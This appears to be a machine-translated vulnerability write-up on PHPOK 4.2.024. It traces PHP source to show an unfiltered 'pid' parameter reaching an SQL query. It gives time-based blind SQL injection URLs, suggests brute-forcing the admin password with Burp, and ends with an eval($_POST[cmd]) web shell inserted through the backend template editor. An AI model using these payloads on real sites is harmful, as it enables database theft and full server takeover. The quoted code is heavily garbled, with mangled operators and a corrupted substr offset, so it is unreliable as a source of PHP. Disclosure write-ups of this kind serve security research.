File/framework/www/post_control.php 26-38 Lines
function Index_f ()
{
$id = $this->get ("id");
$pid = $this->get (' pid ');
if (! $id &&! $pid)
{
Error (P_lang (' Unspecified item '), ' ', ' error ');
}
$project _rs = $this->call->phpok (' _project ', Array ("phpok" + = $id, ' pid ' = = $pid));
if (! $project _rs | |! $project _rs[' module ')
{
Error (P_lang ("Project does not meet the requirements"), ' ', ' error ');
}
ID and PID passed in,
Phpok (' _project ', Array ("Phpok" and "= $id, ' pid ' = $pid));
Follow Phpok
/framework/phpok_call.php
function Phpok ($id, $rs = "")
{
if (! $id) return false;
$cacheId = ";
$content = ";
if ($rs && is_string ($rs)) parse_str ($rs, $rs);
Determine if caching is enabled, enable post-read cache information
if ($GLOBALS [' app ']->cache->status ())
{
$cacheId = $GLOBALS [' app ']->cache->key (' id ' = ' + $id, ' rs ' + $rs), $this->site[' id '], "call");
$content = $GLOBALS [' app ']->cache->read ($cacheId);
}
if ($content) return $content;
Determine whether a built-in parameter or data center is called
if (substr ($id, 0, 1)! = ' _ ')
{
$call _rs = $GLOBALS [' app ']->model (' call ')->get_rs ($id, $this->site[' id ']);
if (! $call _rs) return false;
if ($call _rs[' ext ')
{
$call _rs_ext = unserialize ($call _rs[' ext ');
unset ($call _rs[' ext '), $call _rs[' id ']);
if ($call _rs_ext) $call _rs = Array_merge ($call _rs_ext, $call _rs);
}
if ($rs && Is_array ($rs)) $call _rs = Array_merge ($call _rs, $rs);
}
Else
{
if (! $rs | |!is_array ($RS)) return false;
Arclist, List of articles
Arc, single-article Information
Cate, classified information
Catelist, Classification tree
Project information
Sublist, sub-project information
Parent, parental project information
plist, sibling project information
fields, field form
User, Member
UserList, member list
Total, number of articles
CATE_ID, Current classification information (no items, no links generated)
Subcate, sub-classification information, sub-classification under the current classification
$list = Array (' arclist ', ' arc ', ' Cate ', ' catelist ', ' project ', ' sublist ', ' parent ', ' plist ', ' Fields ', ' user ', ' userlist ', ' Total ', ' cate_id ', ' subcate ');
$id = substr ($id, 2881064151);
If it is arclist and the Is_list attribute is not defined, this property is enabled by default
if ($id = = "Arclist")
{
$rs ["is_list"] = $rs ["is_list"] = = ' false '? 0:1;
}
if (! $id | |!in_array ($ID, $list)) return false;
$call _rs = Array_merge ($rs, Array (' type_id ' = $id));
}
$content = $this->load_call ($call _rs);
if ($content && $cacheId) $GLOBALS [' app ']->cache->write ($cacheId, $content);
return $content;
}
is to call a function
Look at that.
Phpok (' _project ', Array ("Phpok" and "= $id, ' pid ' = $pid));
With _project this function
/framework/model/data.php 1118-1139
Public Function _project ($id, $ext =false)
{
if ($this->cdata[' project ' [$id])
{
$rs = $this->cdata[' project ' [$id];
}
Else
{
$sql = "SELECT * from". $this->db->prefix. " Project WHERE id= ". $id;
$rs = $this->db->get_one ($sql);
if (! $this->cdata[' project ')
echo $id. ' ---'. $rs;
$this->cdata[' project ' [$id] = $rs;
}
if (! $rs) return false;
if ($ext)
{
$ext = $this->ext_all (' project-'. $id);
if ($ext) $rs = Array_merge ($ext, $rs);
}
return $rs;
}
The ID is not filtered and is brought directly into SQL.
Http://127.0.0.1/phpok4.2.024/in ... amp;id=1&pid=41
This PID is the project ID value, the default is more than 41, including 41, can also crawl.
Http://127.0.0.1/phpok4.2.024/in ... Amp;id=1&pid=41and sleep (5)
Browser Go 5 Seconds
Http://127.0.0.1/phpok4.2.024/in Amp;id=1&pid=41and 1=if (ORD (substr (Database (),) =112), Sleep (5), 1)
This statement should know, the database of the first character of the ASICC code is 112 browser to 5 seconds, and vice versa directly back to the page.
Then expand, _project this function has a problem, we can search globally, and where to call the _project and then continue to exploit the vulnerability
Do not continue to test, the repair method here is to _project this function to do filtering.
Want to get the administrator's account password burp run it.
Backstage Getshell
Style management
You can edit this PHP file
Insert? ><?php phpinfo ();? ><? or? ><?php eval ($_post[cmd])? ><?
Determine if caching is enabled, enable post-read cache information